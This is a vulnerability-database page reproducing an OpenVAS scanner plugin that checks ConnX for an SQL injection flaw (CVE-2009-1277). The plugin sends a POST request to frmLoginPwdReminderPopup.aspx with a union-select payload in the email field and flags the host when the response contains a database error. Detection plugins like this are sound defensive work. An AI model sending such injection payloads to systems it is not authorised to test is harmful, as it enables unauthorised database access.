ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability
🗓️ 08 Apr 2009 00:00:00Reported by Copyright (C) 2009 Greenbone AGType
openvas🔗 plugins.openvas.org👁 27 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2009-1277 | 12 Jun 200800:00 | – | circl | |
| CVE-2009-1277 | 9 Apr 200916:00 | – | cve | |
| CVE-2009-1277 | 9 Apr 200916:00 | – | cvelist | |
| Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting | 12 Jun 200800:00 | – | exploitdb | |
| Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution | 3 Apr 200900:00 | – | exploitdb | |
| EUVD-2009-1275 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-1277 | 9 Apr 200916:27 | – | nvd | |
| Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability | 5 Apr 200900:00 | – | openvas | |
| Gravity Board X Multiple SQLi Vulnerabilities and RCE Vulnerability | 5 Apr 200900:00 | – | openvas | |
| Sql injection | 9 Apr 200916:27 | – | prion |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/34370 |
# SPDX-FileCopyrightText: 2009 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:connx:connx";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100115");
script_version("2023-07-27T05:05:08+0000");
script_tag(name:"last_modification", value:"2023-07-27 05:05:08 +0000 (Thu, 27 Jul 2023)");
script_tag(name:"creation_date", value:"2009-04-08 20:52:50 +0200 (Wed, 08 Apr 2009)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2009-1277");
script_name("ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability");
script_tag(name:"solution_type", value:"WillNotFix");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2009 Greenbone AG");
script_dependencies("ConnX_detect.nasl");
script_mandatory_keys("connx/installed");
script_tag(name:"summary", value:"ConnX is prone to an unspecified SQL-injection vulnerability because it fails
to sufficiently sanitize user-supplied data before using it in a SQL query.");
script_tag(name:"impact", value:"Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying database.");
script_tag(name:"affected", value:"ConnX 4.0.20080606 is vulnerable. Other versions may also be affected.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/34370");
script_tag(name:"qod_type", value:"remote_app");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
variables = "__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24hfLoad=&ctl00%24txtFilter=&ctl00%24txtHelpFile=&ctl00%24txtReportsButtonOffset=70&ctl00%24cphMainContent%24txtEmail=++'+union+select+%40%40version%3B--&ctl00%24cphMainContent%24cbSubmit=Submit&ctl00%24txtCurrentFavAdd=&ctl00%24hfFavsTrigger=";
filename = dir + "/frmLoginPwdReminderPopup.aspx";
host = http_host_name(port: port);
req = string( "POST ", filename, " HTTP/1.0\r\n",
"Referer: ","http://", host, filename, "\r\n",
"Host: ", host, "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(variables),
"\r\n\r\n",
variables );
buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if (!buf)
exit(0);
if (egrep(pattern:"Syntax error converting the nvarchar value", string: buf,icase:TRUE)) {
report = http_report_vuln_url(port:port, url:filename);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jul 2023 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.00975